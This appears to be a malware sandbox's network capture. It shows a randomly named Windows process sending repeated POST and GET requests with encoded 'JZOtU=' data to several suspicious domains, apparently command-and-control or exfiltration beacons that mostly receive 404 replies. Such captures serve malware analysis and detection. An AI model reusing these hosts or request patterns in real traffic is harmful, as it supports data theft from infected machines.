                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                19 | 192.168.2.4 | 49947 | 176.32.38.130 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                Nov 29, 2024 09:17:25.751926899 CET | 10892 | OUT | POST /j1io/ HTTP/1.1
                                                                                                                                                                                Host: www.acc888ommodate.xyz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.acc888ommodate.xyz
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.acc888ommodate.xyz/j1io/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU= [TRUNCATED]
                                                                                                                                                                                Nov 29, 2024 09:17:27.058898926 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:26 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                20 | 192.168.2.4 | 49952 | 176.32.38.130 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                Nov 29, 2024 09:17:28.411917925 CET | 512 | OUT | GET /j1io/?Tr=kdnPUNSPd0&JZOtU=G6oz2WtW4adnoUNEj0mDd4tA5mRlmRwrrTmm8dHHgSuel3cEdmkBtbgCn6689YtHvLupKFRUL3t0MGFKqSatVnWojK2LYHm9HZs6Gkfl13sfdd70mrgRKgs= HTTP/1.1
                                                                                                                                                                                Host: www.acc888ommodate.xyz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Nov 29, 2024 09:17:29.730864048 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:29 GMT
                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                21 | 192.168.2.4 | 49966 | 161.97.168.245 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                Nov 29, 2024 09:17:35.359877110 CET | 781 | OUT | POST /qrcg/ HTTP/1.1
                                                                                                                                                                                Host: www.nb-shenshi.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=4dinBSmmsZTW8vuF4XCpd+e+3f1MF9KC6fv2ScyfFssD5Pto44kk+GRnBTTsCBr2stDhtCpPntOTuGEhdABIP9yyLb7qng3KVFFKdAU8p3qH4beeYXT7DXmOm3W2yYKM69HjrwMp4veWeqk+eKA0dUhQm29eF77bpZrEUtOXNQZ1PHWaBcAUth5qYX7z6WPz2w==
Nov 29, 2024 09:17:36.629502058 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:36 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                ETag: W/"66cd104a-b96"
                                                                                                                                                                                Content-Encoding: gzip
Nov 29, 2024 09:17:36.629571915 CET | 370 | IN


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49972 | Destination IP: 161.97.168.245 | Destination Port: 80 | PID: 1668 | Process: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:17:38.034024954 CET | 801 | OUT | POST /qrcg/ HTTP/1.1
                                                                                                                                                                                Host: www.nb-shenshi.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=4dinBSmmsZTW9O+F+wWpfee/5/1MOdLL6fj2SYixF+4D4rhoqswkzmRnODTtPhq6stPftHJPnuyTuD4hdzpLddy0D77sjg3KVFFKdAACp3iH7queXWT6O3mJl3W24IKX69HVrxQP4smWeug+fbA3KkhSoW8aNp+Ip8GbbLWDEktMHhbAQthD/hdZFQyH3Vy6t61dAQo/g92fhUWcUd+AIfM=
Nov 29, 2024 09:17:39.271941900 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:39 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                ETag: W/"66cd104a-b96"
                                                                                                                                                                                Content-Encoding: gzip
Nov 29, 2024 09:17:39.271990061 CET | 370 | IN


Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 49977 | Destination IP: 161.97.168.245 | Destination Port: 80 | PID: 1668 | Process: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:17:40.698936939 CET | 10883 | OUT | POST /qrcg/ HTTP/1.1
                                                                                                                                                                                Host: www.nb-shenshi.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.nb-shenshi.buzz
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.nb-shenshi.buzz/qrcg/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Nov 29, 2024 09:17:41.927083969 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:41 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                ETag: W/"66cd104a-b96"
                                                                                                                                                                                Content-Encoding: gzip
Nov 29, 2024 09:17:41.927114010 CET | 370 | IN


Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 49983 | Destination IP: 161.97.168.245 | Destination Port: 80 | PID: 1668 | Process: C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:17:43.352437973 CET | 509 | OUT | GET /qrcg/?JZOtU=1fKHCnrcuLb+woCt8SH3V6St3YgMZevAmKr2RbCfVfhm3PNz+rp77RggAVXwPiu1rMLErXVWwt2AmyUPU1kZI8W3E5DqygOdKGokIjk/qmeUzpHsRWuRdGo=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.nb-shenshi.buzz
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Nov 29, 2024 09:17:44.585321903 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Date: Fri, 29 Nov 2024 08:17:44 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Content-Length: 2966
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                ETag: "66cd104a-b96"
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 29, 2024 09:17:44.585339069 CET | 1236 | IN
                                                                                                                                                                                Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Nov 29, 2024 09:17:44.585351944 CET | 698 | IN
                                                                                                                                                                                Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50002 | 103.75.185.22 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:17:51.175553083 CET | 793 | OUT | POST /ydza/ HTTP/1.1
                                                                                                                                                                                Host: www.taxitayninh365.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.taxitayninh365.site
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=VSrsQJ1QnpkqrZdfhBUw5ysZ/uvuSy7okzip6/FiarGR1D3AU/DHeRx1NxO6EU/nT3qA2NrFrqAjBZjJt6VRMvo9ptlvBtIkCBw2SZbAc23x+8TXXEnXHYX0ekVtOdcAQSMvXEbxU0Z346iR0UcMgp0W+5kEzDeKl57XXrbUJpQ/zfCqTawtAj9gb8okH1Kk3Q==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50007 | 103.75.185.22 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:17:53.840315104 CET | 813 | OUT | POST /ydza/ HTTP/1.1
                                                                                                                                                                                Host: www.taxitayninh365.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.taxitayninh365.site
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=VSrsQJ1QnpkqkZNfkmAwoSsazOvuYS6jkzup67VIZZyR0jHAV63HZRx1DRO/Zk/uT3mi2MXFrqUjBbrJsJ9OO/oz89ltMNIkCBw2SZP+c2vx+JDXXn/UEYXrZkVtF9c+QSNIXFWWU2x346SR0FcLpp0Q65l6+gbOoJepJqvaOYYO2ZPwCrR6SjZTG7hQK23tsQOHtRsrxd8kzVcZxBzHcd4=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50012 | 103.75.185.22 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:17:56.507061958 CET | 10895 | OUT | POST /ydza/ HTTP/1.1
                                                                                                                                                                                Host: www.taxitayninh365.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.taxitayninh365.site
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.taxitayninh365.site/ydza/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Data Ascii: JZOtU= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 50017 | 103.75.185.22 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:17:59.166904926 CET | 513 | OUT | GET /ydza/?JZOtU=YQDMT/cjjLIrhYhQh0Q2mCJ/3eTpFU2r2WGK9Y1kX6vo8j7CWoL4SlIzIlGkR2TnTHSV+ODB3q8FGPL6osY1Ov0k4N9JYf0vMjBOMK/CTnPE/e/ddHfEQpw=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.taxitayninh365.site
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Connection: close
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Nov 29, 2024 09:18:00.879511118 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                content-length: 1238
                                                                                                                                                                                date: Fri, 29 Nov 2024 08:18:00 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
Nov 29, 2024 09:18:00.879605055 CET | 240 | IN
                                                                                                                                                                                Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 50018 | 155.94.253.4 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:06.598763943 CET | 790 | OUT | POST /fsgl/ HTTP/1.1
                                                                                                                                                                                Host: www.rtpmesinkoin.click
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                                                                                                                Content-Length: 202
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=P/4MES7+smWo2+CGQAN61iZVrgYaIx9YODtKcq3W8KrFQSYl8JYxc7ldSrEFJVh2u2FNy4AdxvpAajPt37snrHKSLBa3gb0qqQHg8avQ+dSX9jqWKJUORSLnhapf66TH8SDQzL4tCtnEcKFvBWI17M3z+IlzphZIlKCGWCHQPZzL+ChrYfhKYGYP7+QDWUPJpw==
Nov 29, 2024 09:18:07.839596033 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                content-length: 796
                                                                                                                                                                                date: Fri, 29 Nov 2024 08:18:07 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 50019 | 155.94.253.4 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:09.264436960 CET | 810 | OUT | POST /fsgl/ HTTP/1.1
                                                                                                                                                                                Host: www.rtpmesinkoin.click
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                                                                                                                Content-Length: 222
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                                                                                                                                                Data Ascii: JZOtU=P/4MES7+smWo2fyGDTl6zCYnugYaSB9cODxKcoHG//DFQ3kl9Mkxf7ldZLFuD1h9u2Iyy4sdxvtAajft3LQkpXKQGha1u70qqQHg8eHu+daX8TaWJs0JYyLor6pftKTc8SDizPhKCvfEcK1vBEw0sc316IkwsR8igbP4SEXzOYn22ksxJuAdKG88m5Z3bXyAy0hMORxThTjRnPpLnzMOqCA=
Nov 29, 2024 09:18:10.557490110 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                content-length: 796
                                                                                                                                                                                date: Fri, 29 Nov 2024 08:18:10 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 50020 | 155.94.253.4 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:11.938196898 CET | 10892 | OUT | POST /fsgl/ HTTP/1.1
                                                                                                                                                                                Host: www.rtpmesinkoin.click
                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                Origin: http://www.rtpmesinkoin.click
                                                                                                                                                                                Content-Length: 10302
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Referer: http://www.rtpmesinkoin.click/fsgl/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
Data Ascii: JZOtU=[TRUNCATED]
Nov 29, 2024 09:18:13.133554935 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                Connection: close
                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                content-length: 796
                                                                                                                                                                                date: Fri, 29 Nov 2024 08:18:12 GMT
                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 50021 | 155.94.253.4 | 80 | 1668 | C:\Program Files (x86)\tHcsGMeQYlazGMpcRiQGhQQPpzXDNwmPrsTdhZtOMjusMjaFsBFwFhwNCXNn\neghZqrDWkxUmu.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 09:18:14.605983019 CET | 512 | OUT | GET /fsgl/?JZOtU=C9QsHkK47GSD7r6QEBJq03ghiAkwTDhYbFs9cpfO+uKQdjQ23Lhhb84Ia8cTOlIJgW821ZMigtRpVm/E2N9Fm2iWKgKq9aIKjjivs8jTrOy3xS+oUeAgIDw=&Tr=kdnPUNSPd0 HTTP/1.1
                                                                                                                                                                                Host: www.rtpmesinkoin.click
